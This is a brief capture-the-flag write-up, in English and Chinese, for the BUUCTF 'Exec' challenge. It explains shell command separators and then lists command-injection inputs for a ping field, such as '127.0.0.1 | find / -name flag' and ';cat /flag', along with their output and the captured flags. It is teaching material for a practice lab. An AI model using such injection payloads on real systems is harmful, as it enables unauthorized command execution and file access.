【BUUCTF】[ACTF2020 Freshman Competition]Exec
0x00 knowledge points
- No filtering,
管道符
execute with common commands
1、|(就是按位或),直接执行|后面的语句
2、||(就是逻辑或),如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句
3、&(就是按位与),&前面和后面命令都要执行,无论前面真假
4、&&(就是逻辑与),如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令
5、; 前后都执行,无论前面真假,同&,(linux也有)
0x01 problem solving
127.0.0.1|ls
index.php
- It takes a long time to find the flag from the root directory
127.0.0.1 | find / -name flag
/flag
127.0.0.1 & cat /flag
Mark {38aee01b-d1a6-4fcb-93f1-dbf86ef25fd8}
PING 127.0.0.1 (127.0.0.1): 56 data bytes
|cat /flag
;cat /flag
Mark {f40182a0-6749-43f2-b223-9651bf2ef2d0}